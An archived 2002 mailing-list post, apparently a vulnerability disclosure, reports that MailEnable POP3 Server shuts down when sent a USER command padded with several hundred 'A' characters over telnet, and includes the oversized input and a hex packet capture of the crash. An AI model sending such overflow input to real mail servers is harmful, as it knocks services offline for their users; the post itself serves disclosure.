MailEnable POP3 Server remote shutdown !:/ -newest ~ (and previous) bufferoverflow-

From: Ketil Braun Larsen (htx01i12@it-college.dk)
Date: Sun Nov 17 2002 - 14:04:09 PST

Next message: Aviram Jenik: "TFTPD32 Buffer Overflow Vulnerability (Long filename)"

Previous message: Jonas Eriksson: "[tcpdump-announce] initial comments on trojan attack (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) (My first post, please bare with me.) -/\-About.-/\- I found this problem auditing a webserver, it’s a standard bufferoverflow i guess, but i am not sure how to find all the technical information but if anyone knows what to do i would like to know, if some one have the time to send a brief mail or something :) pop3 = mailenabled -/\-Method-/\- #telnet xxx.xxx.xxx.xxx 110 (clear screen) +OK Welcome to MailEnable POP3 Server (then copy and paste this- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - and paste it to the terminal) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -/\-Packet Capture-/\- xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:27:765 0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E. 0010: 00 30 6C E2 00 00 80 06 5C DB D9 3D DF 70 D9 3D .0l.....\..=.p.= 0020: DF 1E 0B 79 00 6E 00 4F F5 99 00 00 00 00 70 02 ...y.n.O......p. 0030: FA F0 15 54 00 00 02 04 05 B4 01 01 04 02 ...T.......... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:27:765 0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E. 0010: 00 30 E3 8B 00 00 80 06 E6 31 D9 3D DF 1E D9 3D .0.......1.=...= 0020: DF 70 00 6E 0B 79 3B 17 72 47 00 4F F5 9A 70 12 .p.n.y;.rG.O..p. 0030: 44 70 1E 65 00 00 02 04 05 B4 01 01 04 02 Dp.e.......... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:27:795 0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E. 0010: 00 4F E3 8F 00 00 80 06 E6 0E D9 3D DF 1E D9 3D .O.........=...= 0020: DF 70 00 6E 0B 79 3B 17 72 48 00 4F F5 9A 50 18 .p.n.y;.rH.O..P. 0030: 44 70 8B 1F 00 00 2B 4F 4B 20 57 65 6C 63 6F 6D Dp....+OK Welcom 0040: 65 20 74 6F 20 4D 61 69 6C 45 6E 61 62 6C 65 20 e to MailEnable 0050: 50 4F 50 33 20 53 65 72 76 65 72 0D 0A POP3 Server.. xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:27:775 0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E. 0010: 00 28 6C E4 00 00 80 06 5C E1 D9 3D DF 70 D9 3D .(l.....\..=.p.= 0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 48 50 10 ...y.n.O..;.rHP. 0030: FA F0 94 A8 00 00 ...... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:27:945 0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E. 0010: 00 28 6C F2 00 00 80 06 5C D3 D9 3D DF 70 D9 3D .(l.....\..=.p.= 0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 6F 50 10 ...y.n.O..;.roP. 0030: FA C9 94 A8 00 00 ...... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:28:276 0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E. 0010: 02 22 6D 07 00 00 80 06 5A C4 D9 3D DF 70 D9 3D ."m.....Z..=.p.= 0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 6F 50 18 ...y.n.O..;.roP. 0030: FA C9 1E 3D 00 00 55 53 45 52 20 41 41 41 41 41 ...=..USER AAAAA 0040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00A0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00B0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00C0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00D0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00E0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00F0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 01A0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 01B0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 01C0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 01D0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 01E0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 01F0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0A AAAAAAAAAAAAAAA. 0230: xxx.xxx.xxx.112->xxx.xxx.xxx.30 Time 19:49:33:003 0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E. 0010: 00 28 6F 73 00 00 80 06 5A 52 D9 3D DF 70 D9 3D .(os....ZR.=.p.= 0020: DF 1E 0B 79 00 6E 00 4F F7 94 3B 17 72 6F 50 11 ...y.n.O..;.roP. 0030: FA C9 92 AD 00 00 ...... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:28:466 0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E. 0010: 00 28 E3 BA 00 00 80 06 E6 0A D9 3D DF 1E D9 3D .(.........=...= 0020: DF 70 00 6E 0B 79 3B 17 72 6F 00 4F F7 94 50 10 .p.n.y;.ro.O..P. 0030: 42 76 4B 02 00 00 20 20 20 20 20 20 BvK... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:33:003 0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E. 0010: 00 28 E6 A0 00 00 80 06 E3 24 D9 3D DF 1E D9 3D .(.......$.=...= 0020: DF 70 00 6E 0B 79 3B 17 72 6F 00 4F F7 95 50 10 .p.n.y;.ro.O..P. 0030: 42 76 4B 01 00 00 20 20 20 20 20 20 BvK... xxx.xxx.xxx.30->xxx.xxx.xxx.112 Time 19:49:33:093 0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E. 0010: 00 28 E6 AD 00 00 80 06 E3 17 D9 3D DF 1E D9 3D .(.........=...= 0020: DF 70 00 6E 0B 79 3B 17 72 6F EC A0 B4 24 50 04 .p.n.y;.ro...$P. 0030: 00 00 E4 A2 00 00 20 20 20 20 20 20 ...... ______________________________________________________________________ -/\-and so on-/\- So now you probably seen all the misspellings and so on anyway, i hope it won’t cloud your mind too much. -/\-Me Me Me.-/\- Ketil Braun Larsen. www.nerds-united.com Edu. www.It-collge.dk "Guess that where to late huh?"

Next message: Aviram Jenik: "TFTPD32 Buffer Overflow Vulnerability (Long filename)"
Previous message: Jonas Eriksson: "[tcpdump-announce] initial comments on trojan attack (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Nov 18 2002 - 21:25:11 PST